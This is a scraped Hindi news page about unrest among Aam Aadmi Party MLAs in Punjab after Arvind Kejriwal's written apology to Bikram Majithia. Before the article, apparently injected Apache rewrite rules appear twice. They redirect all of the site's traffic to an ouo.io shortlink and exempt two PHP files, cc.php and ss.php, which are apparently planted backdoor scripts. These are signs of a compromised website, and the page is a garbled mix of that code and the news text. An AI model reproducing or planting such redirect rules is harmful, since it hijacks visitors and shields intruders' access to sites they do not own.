
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 764
नई दिल्ली। दिल्ली की केजरीवाल सरकार में कई अन्य विधायकों के शामिल होने की संभावना है। उपमुख्यमंत्री मनीष सिसोदिया ने पंजाब के सभी आम आदमी पार्टी विधायकों की आज शाम को बैठक बुलाई है। बैठक में मुख्यमंत्री अरविंद केजरीवाल भी मौजूद रहेंगे। हालांकि कुछ विधायकों ने बैठक में शामिल होने की बात कही है वहीं कुछ विधायकों ने साफ इनकार कर दिया है। दिल्ली में आज की बैठक के बारे में सुखपाल खैरा के खेमे के विधायक कवर संधू ने कहा है कि वो इस बैठक में शामिल नहीं होंगे। उन्होंने कहा कि जिन्हें उनसे बात करनी है वो चंडीगढ़ आकर बात करें।
सूत्रों के मुताबिक आम आदमी पार्टी नेता संजय सिंह और पंजाब के विधायक एचएस फुल्का नाराज विधायकों के मान-मनौव्वल में लगे हैं। आपको बता दें, दिल्ली के मुख्यमंत्री अरविंद केजरीवाल द्वारा मानहानि मामले में पंजाब के पूर्व मंत्री और अकाली दल नेता बिक्रम मजीठिया से लिखित माफी मांगने के बाद से कई विधायक नाराज हैं। कई नेताओं ने बगावती तेवर अपना लिया है।